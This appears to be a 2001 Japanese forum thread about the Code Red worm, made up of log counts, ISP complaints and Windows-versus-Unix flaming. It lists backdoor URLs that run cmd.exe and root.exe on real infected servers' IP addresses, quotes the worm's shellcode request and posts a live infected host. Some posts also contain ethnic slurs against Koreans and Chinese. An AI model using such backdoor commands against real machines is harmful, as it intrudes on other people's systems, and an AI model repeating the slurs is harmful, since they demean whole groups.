メールを介するウィルスなんかに感染した会社も対象にせなあかんねぇ。

ニュースでやってた。国内200台のサーバが感染だってさ

無線は、傍受するだけなら合法なのにね。

@NIFTYで接続しているので、ここからのが圧倒的に多いのでセンター宛に連絡も何の反応も無し。
１件づつ潰すのは大変だろうけど、せめて契約者に警告のメールくらい流しても良さそうな物だと思う。
JPCERTからのインフォメーションも出ているが、パッチも当てずに放置している連中が見ているとは思えないから、プロバイダからも流すべきだと思うんだけど。

うちもニフティ。
７日付で警告でてたけどトップページに載せるかメールで喚起しないと意味な〜い。
会員に直接警告するのはプロバにしかできないからねえ。
放置連中にping打ちまくったら気がつくかな．．

この際バカから罰金とって
ネットワークに役立てよう

>>241
200台って、ウチのマシンノックしたのが 200 台くらいだよ (藁

>>241
うーん少なくとも 61で始まる国内だけで50近く確認しているんだが
最低でも 1000以上はあるはず

おはよう

これって感染PCの遊び方だろ?

http://210.119.33.149/c/winnt/system32/cmd.exe?/c+dir
http://210.220.214.233/c/winnt/system32/cmd.exe?/c+dir
http://210.21.31.181/c/winnt/system32/cmd.exe?/c+dir
http://210.207.36.10/c/winnt/system32/cmd.exe?/c+dir
http://210.91.104.12/c/winnt/system32/cmd.exe?/c+dir
http://210.120.24.191/c/winnt/system32/cmd.exe?/c+dir
http://210.85.108.97/c/winnt/system32/cmd.exe?/c+dir
http://210.91.80.129/c/winnt/system32/cmd.exe?/c+dir
http://210.220.217.151/c/winnt/system32/cmd.exe?/c+dir
http://210.96.195.167/c/winnt/system32/cmd.exe?/c+dir

>> 246

うちは、もう 1301 回 もノックされてます :(

すげー『トントン　開いてますか』が１３０１０回　

>>246
警察庁のとこの鯖に来たのが200件なんだそうな。
んで国内感染200台以上って発表したんだそうな。

共同通信系列の朝刊にのってると思う。
WEB上で該当記事は見つからなかった。

NNNタイプはXXXの1/10程度だけど散見するね
XXXは61.*.*.* （うちはAsahi-Net）ばっかりだけどNNNは210が多いかな
一時期に比べたら減ったけど10分に一回くらいやってくる

やっぱうちのログにどさくさにまぎれてＦＴＰにアノニ試したやついるよ。
別ファイルに逝けるか試してやんの。

>>249 もう秋田。次回はデリとか企業か政府機関にしてくれ。

8/8の結果
７２２匹　すべてX　うち２４件日本、内１件営業サーバー、台湾６件、１件営業サーバー、残りはすべて糞チョソ。

ちなみにこちらは　IP　２１１.*.*.*

うちのメールサーバーtelnetでつなぐとバージョン答えるんだよね。
どうにかならんかな。

>>229
Infosphereなら俺が2回ほどｺﾞﾙｧした。ちっとは効果あったんか？
ここから1日60回以上ノックされてた。次に多いのはPlala。

http://www.microsoft.com/japan/
のトップに案内が出ている。遅いって。

こういう事態になってしまったら一般マスコミも使って
告知するべきだと思うぞ、MSは。

>>257
Linux nara ipchains or iptables de
filtering sureba?
ipchains -A input -s ! 192.168.0.0 -d 0/0 23 -l -j DENY

Nazeka Canna ga tatanai. romaji sumaso.

>>259
ＩＩＳ４．０とＩＩＳ５．０を・・だけでいいんですか、ほう〜

前スレにあった　海底ケーブル切断のAAは、面白かった（W

>>260
arigatou
Linux zyanainndesuyo W2Kde WWW to FTP to mail betubetuno
sofuto wo tatetemasu.

>>261
俺も気になったよ。

特に Win2K Pro ユーザーが、自分の PC で IIS 動いてること
気づいてないこと多いから文面直してくれ、と Feedback のページ
で送っておいた。
http://www.microsoft.com/japan/feedback/

これからMSに電話でも申し入れときます。

ｗ２ｋってついこの前３００万本出荷だっけ？
>>261
あれではだれもクリックしないな。
鯖屋はＴＯＰ見ないし。

さて納品いくよ、お後よろしく

カンコックなんかにはメールしてるの？＞ALL

韓国のIIS鯖管理者は何やってんだ

キムチくってるニダ

$B!c%^%$%/%m%=%U%H(BIIS$B%;%-%e%j%F%#>pJs%;%s%?!<!d(B
Tel$B!'(B0120-69-0196
$B1D6H;~4V!'(B24$B;~4V(B

＜マイクロソフトIISセキュリティ情報センター＞
Tel：0120-69-0196
営業時間：24時間

>>112
sun-starうちにもきたよ。でも歯磨き会社じゃなくて、管理者責任者名がぜんぶ中華系のシステム屋(ﾌﾟだった。

同じサーバから一分間に５回もアタックがあるのはどういう事かね？

>>273 律儀に串経由してんじゃねーの (藁

ただいまマレーシアからいらっしゃいました。
東南アジアにも広まりつつある模様。

http://dhcp-****.nava21.ne.jp/scripts/root.exe?/c+dir+"c:\必ず読んでくださいね！\"
これﾜﾗﾀ

Directory of c:\必ず読んでくださいね！

2001/08/08 12:11p <DIR> .
2001/08/08 12:11p <DIR> ..
2001/08/08 12:10p <DIR> このマシンはCodeRedに感染しています
2001/08/08 12:10p <DIR> 感染してると外部からこ〜んな事も出来ちゃいます
2001/08/08 12:11p <DIR> 早急に対処した方がいいですよ〜！
0 File(s) 0 bytes
5 Dir(s) 2,242,801,664 bytes free

親切な人だぁ

拝啓
Windowsのサーバ管理者の皆様
私はFreeBSDにてサーバを構築しております山本と申
します。

Code Redからの大量アクセスありがとうございます。
お蔭様で回線が非常に遅くなり、私用、公用共に
非常に支障をきたしております。

そこでお願いがあります。
即刻回線を切断するか、PC-UNIXに乗り換えてください。
MS製品はインターネットに向きません。

>>267
してない
カンコックの人には面倒なもんで（藁

ここのすれは、Win信者いるか？

いまログ確認してたらこんなの発見。
138.87.*.* - - [09/Aug/2001:05:05:42 +0900] "GET /default.ida?NN(中略)NN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 328
whoisの結果
Illinois State University (NET-ILSTU)
3500 Telecommunications
Normal, IL 61790-3500
US

Netname: ILSTU
Netblock: 138.87.0.0 - 138.87.255.255

Coordinator:
Telecommunications (TE-ORG-ARIN) [email protected]
(309) 438-8731
Fax- (309) 438-8755

Domain System inverse mapping provided by:

OSIRIS.ILSTU.EDU 138.87.4.1
ISIS.ILSTU.EDU 138.87.110.1

Record last updated on 28-Jan-1999.
Database last updated on 7-Aug-2001 23:06:08 EDT.


イリノイ州立大学、新しいサーバ立ち上げた途端に感染したんだろうか？

>>277
connect24h からのコピペ。
それとも向こうで叩かれたから逃げてきたの？（藁

>>281
いや、勝利のおたげび参りました。
Windows管理者駆逐

がいしゅつかもしれんけど会社についてメールをチェックしたら
M$からCodeRedに関するメールが来てたよ。

>Code Red ワームに対するマイクロソフト製オペレーティングシステムの
>セキュリティ対策の確認および徹底に関するお願い


おせーよ！！

>>282 ？x0028;？xff9f;？x0414;？xff9f;？x0029;？xff8a;？xff67;？x003f;

>>277
んで Windows 管理は Windows オタクにしかムリとか言うんだろ。
安心しろ。お前には UNIX も Windows もムリだ(ｗ

まずは手紙の書き方からだな・・・

Macでサーバ構築してますが何か？

>>287
WebSTARのログに出てる？＞default.ida
俺のところのLinux-Apacheは出ても、WebSTARのログには痕跡無し。

ADSL で 211.* のIPアドレスが割り当てられてたときは、
Code Red が1日で750〜900回ぐらい来てたけど、
接続しなおして 61.* になったら200以下になった(藁。

>>288
出てるよ。
今日の午前０時からだとだいたい130回ぐらいアタックがある。
ちなみにWebSTARじゃなくてOS標準のWeb共有（笑
ヘボいですか？

ウチに来たco.jpのぶんはメール送ったんだけど、
そのうちの一社は
、
『ウチの会社、及びそのサーバーはWindous系とIISは使っておりません。
　また、送信logにもそちらのIPは記録されておりませんが。』

って返事が返ってきたんだけど、これって偽装されてたってこと？
あまりの多さにそのlog消しちゃったんで検証のしようがないけど。

今回のCodeRedの件でびっくりしたこと。
・Winサーバが日本にあまりに多いこと。
・Winサーバ管理者は無知が多いので被害が増大してい
　ること。これに彼らは気づいていないこと。
・Winサーバを立てても悪びれもしない人があまりに多い
　こと。
・Winは新参者のくせにでかい態度を取る輩が多いこと。

Winがインターネットに参入しなかったら。
・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
　同等のウイルスが発生しても、ここまで広がらなかったは
　ず。
・馬鹿な常識が蔓延しなかったはず。

>>290
そうなんだ。
バーチャルでもIP振ってれば、出るよね普通。

>>291
その会社、外に開いてる串あるんじゃないか？（藁
しかしCode redが串使うかは謎だな。

>>292
Internet Wormって知ってる？

>>292 ハイハイ。あんたはBSD使ってて良かったね。
バックドア突いてIIS落として回るなり好きにしたら？

>>292
connect24h で叩かれたからここに来るのｶｺﾜﾙｲ

Win管理者は中村正三郎から勉強し直すことをお勧めします。ぷっ

>>297
こんな板で半角カタカナカコワルイ

CodeRedのコードを利用して、感染してるIISサーバ自体を
HALT状態には出来ないかな？
サーバ停止したら困るだろうけど、この状態が収まらないのも困る。

勝手にIISをインストールするアプリは
具体的にどんなのがありますか？

>>300
止めたほうがいい。前スレで散々既出。

>>294
一応、社内のは全部チェックしてくれたみたいよ。
あと、前スレで串経由もあるってlogがあったね。

infospereなんかウチに来た分のlog送ってやっても
なんの音沙汰も無しだしなぁ。

>>301
手元で検証できないんでよくわからないのだが、
http://www.microsoft.com/japan/technet/security/codeptch.asp#target
ではないだろうか？

61.152.193.51

10:15からわずか一分の間に30発！！
こんなパターン初めてだ

>>306 よくある。うちは32連発来たことあるぞ。

hが抜けてた。infosphereね。

中国：反米感情が強く国家推奨OSがlinaxなので大した被害はない
台湾：中国語環境？のため600発撃ちまくるので超迷惑
韓国：台湾と61や211などを共有し、ｲﾝﾌﾗが整ってるのでﾎﾞﾛﾎﾞﾛ
日本：(ﾟдﾟ)！！

こんな感じでしょうか？

>>309
"linax" ぷっ

いーな
LINAX

>>309
昔は「リヌクス」って発音してたの知ってるか？
それをWin馬鹿が「リナックス」っていいまくって
人数が多いもんだから定着したんだよ。
ったくろくなことしないよ、Win信者。

"linux"　ぽっ

落ちまくってた INTERLINK は復活してきたみたいだね
http://www.interlink.or.jp/notification/backno/2001/info009.html

ｲﾊﾟｰｲ引っかかるけどね
http://www.google.com/search?hl=ja&safe=off&q=linax&lr=lang_ja

まあ、今回の件でプロバイダはWinサーバを
信用しなくなったのは事実です。
固定アドレス提供しているところなんて、
個人サーバ立てる時はWinは駄目ーーー
って事になってくれるとうれしいなあ、、ぽっ

>>148
CodeRedが活動した際にでた不達のIPアドレスをARPで解決しようとしていると思われ。
しかしCATVではﾈﾄﾜｰｸ設計がおかしいのか関係ないセグメントのARPまでが転送されまくってて
大変なことになっているよう。鬱氏。

>>310=312=316
いちいちスレ汚すな。Win の悪口は
http://www.microsoft.com/japan/customer/information/phone.htm
ここにでも電話して一人でわめいてろ。
ったく厨房はこれだから...

>>304
ログ見てる限り今のところｺﾞﾙｧ全然効いてねえなInfosphere。
ていうか俺の知る限り大体同じ地域から来てるから、ユーザの特定
かなり簡単だと思うんだけど。
今InfosphereのADSLで岡山と長崎から繋いでる奴、お願いだから気付
いてくれ…ノックされまくってんだよ…。

正：inax

>>320 ﾜﾗﾀ

>>318
おまえは"linax"だな。ぷっ

cse7-**.osaka.mbn.or.jpさん、気付いてよぉ

自動連絡モジュール
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz
これ大丈夫なのかなぁ。spammer の仲間入り〜
とかいうことならないのかしら。

>>312
アメリカではウニクスといっていたな→Unix
というより、君のようなのはUnixユーザの評判おとすだけだよ。
信者の評判はしらんが。
CodeRed版なんだから、そのネタで話せ。

>>325
CodeRed版Linax。激しくつづり間違った。

ああでもテクニカルサポートに警告は出たなようやく…＜Infosphere
でもあそこ見るぐらいの奴なら、とっくに対処してると思うぞ俺は…（　´Д｀）

厨房を無視できないアナタも厨房。以下電波は完全放置で。

>>328
そんなあなたも厨房。。ぷぷぷぷぷっ

Linus氏もLinuxは好きな読み方でいいって言ってるんだから、別に何でもいいでしょ。
読み方でユーザを非難するのは間違い。

ぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷっ

Linuxリヌス

BSDって読んでもいいかな

>>319
長崎と岡山、たぶんウチに来てるやつと同じとこからですね。
あと、浦和からも来てる。＜nttpc

ようやく落ち着いてきたみたい。
昨日２時間ほど繋いでたけどアタック一回のみ。

ﾉｰﾄﾝ先生のｳｨﾙｽ定義更新間隔が短いよ

SystemV

>>324
・Security Focusにもメール送るみたいだし(DoSになっちまう)
・いっぺん捕まえたのの重複チェックしてないみたいだし。
・人手がまるでなしで直接sendmailで送ってるし。
・PPPユーザかどうかフィルタしてないように思うし。
メール文面と確認用レポート作成して、手動で送信できるやつにしないといけないんでわ・・・

まだまだアクティブみたいよ。
さっき12:43の１分間だけで別々のところから３匹。
大体１〜２分に１匹くらいかな。

IIS持ってるだけで加害者よ

ぷぷぷ、ちょっとは謙虚になれWinユーザども。
新参者め

不思議な表記「CodeRedIIの被害は200件」
http://slashdot.jp/article.pl?sid=01/08/09/0112229&mode=thread&threshold=
報道しない方がマシだよ、これじゃ。頭悪いにも程がある。

>>338
だよねぇ。やっぱりこういうので騒ぎを増幅しないほうがいいよね。

10分で２０回。

IIS持ってるだけで加害者よ

ぷぷぷ、ちょっとは謙虚になれWinユーザども。
新参者め

>>342
そうね。たぶん、Code RedよりもSMTPで多量の無駄トラヒックが・・・

coderedらしき、ファイル落ちて、ましたよ

>>344　今日の一言

「弱い犬厨ほどよく吠える」（藁

>344

で　ねぇねぇ　かんせんしてるのめっけたら
どうあそぶの？

Winしかいじれない奴の履歴

学歴：専門卒
言語歴：COBOL 7年
VB 2年
こんな奴が最近になって「インターネット」
に精通してるふりしてWinでサーバ立ててるん
だよな。うせろ。ぼけ。

Hackers loooooooooooooooooooooooooooooooooooooooooooooove Noodles

二重ポストしてる時点で逝ってるしな（ｗ

ｺﾎﾞﾗｰ臭いな

Windowsの非難がしたい人はWin板にでも逝ってやってくださいな。

ていうか、Unixずっと使ってたけど、通用しなくてここでほえてるんでしょう。
真面目に仕事してたらいちいちWinにかみつかんよ。ぼやくだけ。

ぼくは、２ちゃんねるのほうが
すこしはりょうしきのあるひとがおおいとおもったので
こっちにきました。
でもだめでした。
さよなら

荒しは無視！

今日の昼までのログみたら国際色豊かすぎ(笑
ブラジルとかインドとか、やっぱりメール出すべきだろうか？

じゃっ、お元気で。

さよなら

JALの発券システム　停止！　空港パニック。
CodeREDくさいなぁ〜〜〜。
現在調査中らしいです。駐機だらけになるやんけ！
ニュース注視ｾﾖ

>>354
なんで噛み付いているかというと
ただでさえMS嫌いなんだが、今回のCodeRedの件で
あまりにも対処しない馬鹿管理者がWinには多いと
いうことで切れた。
いい加減にせいよ。まじで。
おまえらのせいでまじで支障をきたしとるんじゃ。

>>341
ホームページ書き換え事案に関する対策について
http://www.npa.go.jp/hightech/notice/notice.htm

これを元に書いたようだね。
内容的には、物足りないが、
警察庁としては、書いただけ誉めてあげよう。
これからは、２ｃｈを顧問にすることを提言しよう。

> 自己増殖型プログラム「Code Red２」（以下「当該ワーム」という。）については、
> 当庁では国内だけで被害を受けていると思われるサーバーを２００箇所以上把握しており、
> 都道府県警察を通じて、被害サーバーの管理者への連絡及びその被害状況の確認について指示いたしました。

恐らく上司に「Linuxはタダで構築できるのでLinuxにしましょう」と進言して、
「サポートはどうするんだ、バグはどうするんだ、お前が全てサポートできるのか」
とか言われて何も反論出来なくて、ここでストレス発散しているに10おしりコイン

>>359
Infoseekの速報では正午過ぎに復旧したって出てたけど・・・

　　　　　　　　　　　　/ヽ　　　　 /ヽ　　　　　∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
　　／￣＼ 　　 　　 /　 ヽ＿＿/　ヽ　　　　ﾉ
.r ┤　　　 ト､　　 ／　＼　　　 ／ ※ ＼　 くCodeRedにやられたニダ！日本に誠意有る
|.　 ＼＿／　 ヽ <　　　　ﾉ￣|　　　／　 〉 ＜ 謝罪と賠償を求めるニダ！
|　　　＿_（￣　 |　＼　 ├─┤　　　／　　　∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
|　　　 ＿_）＿ノ
ヽ＿＿＿） ノ 　

>>361
ああ、ここも Windows2000 サーバーだけみたいな書き方
してるし(溜息

とりあえず、誰かは噛み付く先を間違っているほうに一票。>>360
ところで警視庁。>>361
「Windows2000Server上で動作する・・・」
困ったものだ・・・

>>360
Windows以外のユーザからみるとあなたの発言はとても不愉快なんですけど。

Windows2000で サーバ立てた = Windows 2000 Server。
オーマイ スパゲッティ

>>349
自分のチンコしかいじれない奴の性遍歴

学歴：オナニー
言語歴：オマンコ
せんずり履歴２０年
こんな奴が最近になってセックス
に精通してるふりしてﾁﾝﾎﾟ立ててるん
だよな。うせろ。ぼけ。

>>362
MS信者のお決まり。ぷぷ。サポート。。ぷぷっ。
今だに案件でWinでクラサバやってる奴のお決まり。ぷぷ

>>349 の履歴

学歴：中学在学中
言語歴：VB 2年
　　　　C 一ヶ月
こんな奴が最近になって「犬糞(Turbo)」のインストールにやっと性交して、
精通現象は半年前のくせに女を経験してるふりして
Linuxでサーバ立ててるんだよな。
うせろ。犬厨。 （藁

>>363 日本放送協会でも逝ってたよ。

>>360
そういうおまえはWinユーザ決定。だせっ。

平日の真っ昼間から煽ってる夏厨君は無視の方向で

>>366 困ったものだね。
警視庁に電話で「誤解招くから書き直せｺﾞﾙｧ!」するの、
ちょっとドキドキ（藁

Windows2000Server...
KCchou senyou no customized na Windows?

自分を爆撃？ >>373

お帰りはこちら
http://yasai.2ch.net/test/read.cgi?bbs=win&key=995359813

>>377
おれじゃないage

ただいま〜
あららら、板間違えたかと思ったyo

というわけで語り尽くしても語り尽くせぬ話題はみんなで
http://yasai.2ch.net/test/read.cgi?bbs=win&key=995359813 へGo!!
888くらい逝ってたから、スレ満杯にできるYo!きっと。

どう見てもこの⇒あげ」　ってヤツ
子供としか思えんのだが・・・
発言が頭悪そうだし。

Apacheぐらいは普通に書けるんだろ。
じゃなきゃUNIXは使えないよなぁ？
バグも自分でパッチ当てれるよな？
あげくん？

しかし、素人でもないだろうに、よく半角カタカナ
が使えるよなあ。恥かしくないのかなあ。
こーゆー奴はメールにも半角カタカナ使ったりする
んだよな。はははぷぷぷ。

わしもビックリだYo! >>380
ﾊｱﾊｱ君のほうが、楽しかったな(藁

>>383
はあ？そんなこと聞くこと自体が厨だろ。
わりーけど、俺CCNP,RHCEなんだけど。

どうせならアパッシュダンス丸木君も呼んできてよ。

>>384
無知だねーSolarisでも標準で使えるしPC-Unixでも工夫すれば使えるよ。
犬だから知らなくてもしょうがないか。友達もいないみたいだね（ﾌﾟﾌﾟﾌﾟ

資格自慢厨房か。（プ

結婚騒ぎはどうなったんだろ。→apach logクン。

資格だけ自慢して、コミュニティに何を貢献したかを書かないなんて的外れもいいとこだな（プ

ていうか、もはや何の板だかまるでわからん。赤丸に世界を覆われてしまったに違いない。

>>390 そういえばそんな事があったな。

>>388
「工夫すれば」.... プププWin厨
>>389
オマエトチガッテナー

やった〜！　ついに go.jp 系からきました。

荒しは放置！

警視庁ハイテク相談窓口に電話で指摘しときました。
直してくれるかもしれません。

>>393
one night love affairだったのかも？

CCNA,RHCE<<ププププCisco厨&Redhat厨か救いようがねぇな（ププププ

全体的に数は減ったけど
相変わらずｶﾝｺｯｸとﾁｬｲﾆｰﾂﾞがﾀﾞﾝﾄｼ
ﾊﾝｶｸ ﾏﾝｾｰ

いや、まさかここでいろいろ言ってる奴って
CCNAもままならないんじゃないだろうな。
そんな奴を煽ってた俺age

>>398
CCNPだっての

専門厨房は置いとけや。

2chぐらいでしか自己を主張できる場面がないのね＞あげ

>>396
電話で指摘とは・・・
さすが

関係ないんだが昔高校の自販機にあげくりというパンがあった。
今は無いらしい。
あのパッケージにノスタルジーを感じる俺ももう若くないな…。

今日の「しみじみクン」の感想が楽しみｶﾓ

こんな時間に書いてる管理者は夏厨

>>403
オマエモナー

>>397 一夏の恋も悪かないさ…（　´Д｀）

>>407
オマエモナー。

あげ君、自慢以外に会話の内容が薄くてさびしいので、せっかくだから去るまえに
自己紹介フルにお願いします。

>>411
ばーか

http://211.240.51.236/

自宅サーバに多少のアクセスがあった程度で、
いちいちプロバイダにゴルァしてる奴とかｶｺﾜﾙｲ
>>319ﾄｶ

しかし、asahi.com がちーっとも報道しないのは、あれかね？
やっぱり朝日だから？

>>413
ブラクラ反対

しかしsageで書いても書かんでも結局このスレが一番上ってのは

>>416
ブラクラじゃなくてCodeRedに感染したサーバ

>>375
確かに連絡窓口が電話しかないことをお詫びいたします。
ご連絡は、各地方毎に電話番号がありますので、中国の方は中国へ、ブラジルの方はブラジルの方へお電話ください。
情報が中央に届くまで大変お時間がかかりますので、しばらくお待ちください。

あの国は本当に迷惑だな。

赤帽厨だったか、やっぱりな。

>>414
多少じゃないんだけど…
ログチェックしてみぃ。

ｴ-ﾝ ﾏﾀ-ﾘｽﾚ ﾀﾞﾀﾉﾆ

>>414 ｶｺﾜﾙｸﾃｺﾞﾒｿ｡

>>413
から落ちてくるものってなに？

>>418
なんだ、なんかダウンロードさせられたが、ただの壊れページだった(藁

>>414はログチェックのしかたさえ分からないに一票！

>>421
ちゃうでーー。俺はSlackやでーー。
他にLinux周りにメジャーな資格がないから取っただけやでー。

319 じゃないけど、
>>414
うちが管理してるネットワークで、無駄トラフィックによる迷惑受け
まくりだから焼け石に水なことは判ってるが１つ１つツブしてるのよ。
偽善者気取りでやってるわけじゃないよ。マジで。

本当に、お疲れ様です。　>>429

>>428　プログラミングの資格は持ってないの？

もう相手にしない方がいいって・・・

>>431
プログラミングの資格って、いいのあるの？
会社が言うんでしょうがなく情報処理1種・2種うけたけど、あれ通らないようでは・・

>>431 そろそろお帰りいただこうよ

>>423
ｽﾏｿ

>>431
もってませーん。
仕事戻る。また後で煽ってあげるね。ばいばい

／￣￣￣￣￣￣￣￣￣￣￣￣￣￣
| 反応速度が「電子レベルか？」ってやつ結構いますよね
＼＿＿ 　　＿＿＿＿＿＿＿＿＿＿
　　　　　∨
　　　 ∧＿∧　　　　　　　　 　　∧＿∧　　　 ／￣￣￣￣￣￣￣￣￣￣
　　　（　・∀・）　　　　　　 　　　（´∀｀　）　＜　そのわりに無駄な処理かましてるけどな。
　　　（　つ　　）つ□　　　□ ⊂（　　　　）　　|
　　┃ﾚ ＿＿ 　 |￣￣￣￣ |　 ._＿＿ノ┃ 　＼＿＿＿＿＿＿＿＿＿＿
　　┗━┳┳＼ |￣￣￣￣|　./━┳┳┛
　　　　　┃┃　　|＿_＿_＿|　 　　.┃┃ 　 さ、仕事しましょう。

ファイルの存在を確認するにチェック入れた状態でCodeRedScaner掛けたら、
脆弱性は無いと判断されたのですが。

で？？>>438

��(´Д｀）ｶﾞｰﾝ

>>438-440 ﾜﾗﾀ

>>434　名スレ汚してスマソ。こんどきても無視します。

同意

>>442
名スレ、、、ぷぷぷっ
Win厨しかいないのに。。。。。

日経の記事読んでたんだけど、警視庁は全国の都道府県警を通じて、
感染の確認と、ワームの除去を行うように指導する。って書いてあった。

ワームに捕まると警察から連絡が来るのかなぁ？

と言うことで、警察から連絡有った人詳細UPきぼーん

今回のCodeRedの件でびっくりしたこと。
・Winサーバが日本にあまりに多いこと。
・Winサーバ管理者は無知が多いので被害が増大してい
　ること。これに彼らは気づいていないこと。
・Winサーバを立てても悪びれもしない人があまりに多い
　こと。
・Winは新参者のくせにでかい態度を取る輩が多いこと。

Winがインターネットに参入しなかったら。
・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
　同等のウイルスが発生しても、ここまで広がらなかったは
　ず。
・馬鹿な常識が蔓延しなかったはず。

警察はどやって調べんの？

>>447
そう。それが僕も疑問。
ワームに感染しているホストは、簡単に分かるからその後だよね。
プロバイダーの名簿とかを入手するのかなぁ？

警察官が一軒一軒、サービスゥとパッチもって自宅訪ねてきたら
笑えるなぁと思って。念のため感染されておこうかなぁとか思った。

日本はＩＴ後進国なので、Windows でインターネットにサーバ
たてて実用になると思っている人が多いのです。

警察は予防はしないはず。犯人探すだけでせいいっぱいでは。

Code Redｲｲ ってどこの人が作ったんだろね？

>>449 自虐するなよ。　ちょん。

アタック増大が夜間に多いので、むしろ、サーバでない奴が沢山感染していると
見られるが。
・Win2k proで訳もわからず全部入れた。
・ホムペチェックに使ってる。
全部削除か、Winやめれとは言わんからApacheに変更していただきたい今日この頃。

>>449 !（ ゜∀゜)（゜∀゜)ｱdefault.nida?XXXXX…

>>449
実用になるよ。Unix系でもパッチをまめにあてたり
不要なデーモンを止めたりするのはセキュリティの常識。
今回の騒動はOSよりもサーバの管理人が悪いよ。

漏れはなんの被害も受けていないな。
もっともーっと広まれって思っているよ。
みんな本気で静まってくれって思っているの？

前から不思議なのだが、なぜnida。>>453

>>452
このワームの嫌なところは、感染者が被害に気が付きにくいところだぁね。

>>454
UnixでもWinでも、サーバ以外の用途で社会の窓が開いてるほうが問題で、
そっちは、MSなんとかしてほしい。
Windows Updateで出してくれないと、気づきさえしないユーザが多数・・・

>>454
そんなこたーわかってんだよ。
ただ、Win管理者は「マウスカチッ」で
何でも出来ると思ってるネット厨が非常に
多いんだよ。
だから困り果ててるんだ、ったく。

>>455
更なる亜種の出現を期待していたんだが、全然駄目だね
中華流の再報復攻撃があってもよさそう

>>452
ダイアルアップユーザーへのこれ以上の拡大を止めるには、
プロバイダ側でユーザーの port80 宛てのパケットを暫く
ブロックするしかないかもね。あまり現実的じゃないけど。

あと、すでに感染してるテレホユーザーへの対処も難しいな。
夜中はプロバイダの担当者いないし、朝にログ送っても
プロバイダ側でダイアルアップのログと突き合わせて特定しなきゃ
ならんし。

>>455
静まれって思うよ。
ドアノブをひっきりなしにガチャガチャやられてる気分だよ。

>>457
Win厨にはそういう管理者が多いだけだっての。
ウイザードがないと何も出来ないWin厨。

>>460
亜種の出現というより、そこらじゅうに転がってるバックドア
から変なもの注入してるヴァカが多数いるに１票

>>446
マジレスするのもナニだけど、

＞Winがインターネットに参入しなかったら。
＞・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
＞　同等のウイルスが発生しても、ここまで広がらなかったは
＞　ず。
＞・馬鹿な常識が蔓延しなかったはず。

ダメなUNIX管理者が増えただけと思われ

OSに手取り足取りWin厨。

本日の逆引き
61で日本の奴はodn、dion、alpha-net、metaですね
特にodn.ad.jpは改善の兆しすら見えませぬ

>>462　そうですか。
うちでtcpdump -i ppp0でみてただけだけど、
たいした通信量じゃなかったのでどうでもいいかななんて感じた。

>>465
ハア？

>>467
zaq wakwak bai ocn infoweb mctv
もあるよ。

なんか、エロ系から来るんだが…(　´Д｀)

>>471 IPｷﾎﾞｰﾝ

>>469
大丈夫、あんたがダメとはいっとらん。

>>471 エロ系サイトはDQN IIS管理者(というか管理せず勃ちっぱなし鯖)多数と思われ。

あげさんは前スレ前々スレ読んでる？

Ｗｉｎ厨とかあんま関係ないと思う。
結局のところセキュリティの予備知識なくＷｅｂサーバーおったてる管理者に
問題があるんだろ。

でもさ、「鯖置きませんか」なんて簡単に言ってくる鯖売り業者にも
問題あると思う。あいつら放り込んだらそれっきりだもんな。
せめて一通りの「具体的な」対策ぐらい教えていけよ。ｯﾀｸ凸(-｡-#)

ウイルス騒ぎがあるたびにzaqとodnは糞だと思う今日この頃。

今のトコWindows NT4.0/2000のみ？
オレのMacは問題無し？

午後３時までで728。
昨日の２倍のペースになってるんスけど
２個除いてすべてX

IIJ4Uにトップで警告が出たよん

>>469
仮にWinが広まらなかったら、
即席管理者がWinではなくUNIXに流れるだろってこと。
別にUNIXを使っていれば勝手にスキルが上がるわけでもあるまい。

>>474 なんとなく禿しく納得した。

>>474　今晩がたのしみ｡ｳﾌﾟﾌﾟ､ﾎﾞｷｼﾃｷﾀｰﾖ｡

CodeRed�Uって、勝手に再起動かかるんだっけ？
再起動かかると、ゐ-るす消えてバックドアだけ残るんだっけ？

バックドアはどーでもいいから、早く止んで欲しいわこの無駄とらひっく。全く。

>>484 そのとおりだけど、何度でも罹患すると思われ。
なんか、そのむかしシグネチャが長いだけで帯域の無駄と言われたご時世
に比べれば平和な気もするけど、ISDNで業務サバの人あはれ・・・

>>475
新参者です。ぷぷｐ

ここでマジになるのもなんだけどコードレッド飼ってるやつは
サーバー管理者とはかぎらんだろ。
フロントページ使ってるやつも危ないよなんだから。

>>484
常駐していたのは消えても、あっという間に再感染するよ。

>>481
Roger

>>486 つうわけで、Win管理者以外も結構多数なスレである昨今。
どうせ居着くなら、まったりしていただきたい今日この頃。

>>489 ロジャーといえば、首がニュ〜っと・・・

だけど鬱だよな、メールチェックとお気に入りのサイトチェック
してるだけのやつから、攻撃されるんだもの。

>>484
中国語版では 48h, それ以外は 24h でリブートして
バックドアだけ残る。その状態だとまだ再感染するので、
今やってきてる奴はすでに何周かしてるのが結構いると思われ

あと、9月30日でばら撒き停止に入るらしいです。
亜種出てきたらおしまいだけど。

>>486
なんつーか、前スレとかも読まない人に、こーゆーこと言われても…
人の振りみて我が振り直せよ。

>>490
基本はWin管理者駆逐

>>485
>>488
>>493
そういや忘れてたわ。
全社全マシンの対策に追われて疲れてたのかも。
社内感染したら氏ぬしね。外は最初から問題なしだし。
ありがとね。

そーいや、某大手IT企業が社内感染したって噂聞いたけど。

>>493
>あと、9月30日でばら撒き停止に入るらしいです。
この情報ってディスアッセンブルかなんかで調べたのかな？
よく分かるな〜と思って

Code Red って最初ﾁｬｿｺﾛがまいて、
それみたｱﾒｺｳがコード改良してまいたら、
予想に反してﾁｮｿで爆発的大人気ってことでいいのかな？

>>493
誰かが　エシュロン　キーワード　ワームを　今ごろしこしこ作っていると　思われ。

>>496 社員のダイアルアップあたりから拾ったんじゃないかなあ？

>>497 スクリプト厨房が４バイト書き換えただけでどうにでもなるから鬱っす・・・

>>498
んなの同意求められてもワカラン（笑
ただ、中国側は「わが国内で作られたにしては高度すぎるので多分違う」
とか言ってたというのをどっかで見たけど。ソース忘れｺﾞﾒｿ

>>498 言語設定見て、中国ねらいのつもりが韓国で炸裂。

>>501
